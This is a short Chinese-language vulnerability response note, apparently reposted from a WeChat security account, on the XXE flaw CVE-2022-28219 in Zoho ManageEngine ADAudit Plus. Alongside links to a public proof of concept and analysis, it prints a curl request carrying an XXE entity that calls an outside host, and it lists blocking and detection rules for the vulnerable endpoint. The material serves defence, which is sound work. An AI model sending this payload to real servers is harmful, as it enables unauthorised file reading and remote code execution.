Zoho ManageEngine ADAudit Plus XXE漏洞（CVE-2022-28219）处置

一、漏洞通告：

https://avd.aliyun.com/detail?id=AVD-2022-28219

Zoho ManageEngine ADAudit Plus 是美国Zoho Corporation公司的用于简化审计、证明合规性和检测威胁的一款产品。其7060版本之前 agentData 接口存在XXE漏洞，攻击者可在未授权的情况下利用XXE漏洞读取文件，甚至造成远程代码执行。

二、漏洞EXP/POC：

https://github.com/horizon3ai/CVE-2022-28219

三、漏洞分析：

CVE-2022-28219: Unauthenticated XXE to RCE and Domain Compromise in ManageEngine ADAudit Plus

https://www.horizon3.ai/red-team-blog-cve-2022-28219/

curl -X POST http://<adap_ip>:<port>/api/agent/tabs/agentData -d @payload.json{"DomainName": "smoke.net",         "EventCode": 4688,         "EventType": 0,         "TimeGenerated": 0,         "Task Content": "<?xml version="1.0" encoding="UTF-8"?><! foo [ <!ENTITY % xxe SYSTEM "http://10.0.220.200"> %xxe; ]>"}

四、漏洞拦截：

path路径前缀是"/api/agent/tabs/agentData"，拦截

请求参数包含"<!ENTITY"和"SYSTEM"，拦截

五、攻击流量检测：

请求参数包含"<!ENTITY"和"SYSTEM"

path路径前缀是"/api/agent/tabs/agentData"或"/cewolf/"

六、应用指纹检测：

response.body:/.*.manageengine.com.*/

原文始发于微信公众号（xiaozhu佩奇学安全）：Zoho ManageEngine ADAudit Plus XXE漏洞（CVE-2022-28219）处置